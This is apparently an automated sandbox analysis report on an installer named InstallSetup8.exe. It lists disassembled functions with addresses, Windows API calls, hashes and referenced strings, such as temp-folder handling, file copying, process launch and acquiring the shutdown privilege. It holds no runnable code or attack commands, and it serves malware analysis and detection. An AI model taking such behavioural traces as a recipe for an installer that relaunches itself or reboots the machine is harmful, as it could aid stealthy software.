Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0,0040CE0C,?), ref: 00401ED8

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32(00000000,0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32(00000000,004031FC,00000001), ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000,004056D2,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406076 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(00009292,00441800,?,?,00000000,00403530,00441000,00441800,00441800,00441800,00441800,00441800,00441800,0040381C,?,00000008), ref: 00406094
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403530,00441000,00441800,00441800,00441800,00441800,00441800,00441800,0040381C), ref: 004060AF

Strings

nsa, xrefs: 00406083

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Uniqueness

Uniqueness Score: -1.00%

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallSetup8.exePID: 8140, Parent PID: 8040COMMON

Executed Functions

Function 00403532 Relevance: 81.0, APIs: 32, Strings: 14, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32 ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403832
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNEL32(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32 ref: 004039B1
GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
DeleteFileW.KERNEL32(00437800), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNEL32(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsn8FCE.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsn8FCE.tmp,C:\Users\user\AppData\Local\Temp\nsn8FCE.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsn8FCE.tmp,C:\Users\user\AppData\Local\Temp\nsn8FCE.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNEL32(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00403972
1033, xrefs: 00403876
C:\Users\user\AppData\Local\Temp\, xrefs: 0040380A, 0040380F, 00403825, 00403831, 00403840, 0040384D, 00403859, 00403861, 0040394F, 004039D0, 004039FC, 00403A1D, 00403A26
NSIS Error, xrefs: 00403695
TEMP, xrefs: 0040385A
C:\Users\user\AppData\Local\Temp\InstallSetup8.exe, xrefs: 00403A2F
SeShutdownPrivilege, xrefs: 00403AD8
Low, xrefs: 00403848
UXTHEME, xrefs: 00403620, 00403625, 0040362B
C:\Users\user\AppData\Local\Temp, xrefs: 00403927
Error launching installer, xrefs: 004038FD
~nsu%X.tmp, xrefs: 004039A8
TMP, xrefs: 00403862
\Temp, xrefs: 0040382C

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: 1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\InstallSetup8.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-2275619491
Opcode ID: e969c2e22f73361fc79175c4bfa344e76f400cd5c8ceb61292dbf8b91988ccbf
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: e969c2e22f73361fc79175c4bfa344e76f400cd5c8ceb61292dbf8b91988ccbf
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C63 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70
\*.*, xrefs: 00405CCE
pB, xrefs: 00405CBC

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
API String ID: 2035342205-1023570929
Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00403C29 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

GetUserDefaultUILanguage.KERNEL32(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403C43

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

lstrcatW.KERNEL32(1033,0042CA68), ref: 00403CAA
lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

1033, xrefs: 00403C49, 00403CA5
RichEd20, xrefs: 00403E57
RichEdit20W, xrefs: 00403E75, 00403E7B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2E
.DEFAULT\Control Panel\International, xrefs: 00403C95
.exe, xrefs: 00403D37
_Nb, xrefs: 00403DAD, 00403E15
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
RichEdit, xrefs: 00403E84
RichEd32, xrefs: 00403E65

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-236412282
Opcode ID: 668670e2436d8560ce7a95db19fe7fb6d2e11ba6b6241f5eb901d3d615c3ba1a
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: 668670e2436d8560ce7a95db19fe7fb6d2e11ba6b6241f5eb901d3d615c3ba1a
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe,C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017DA

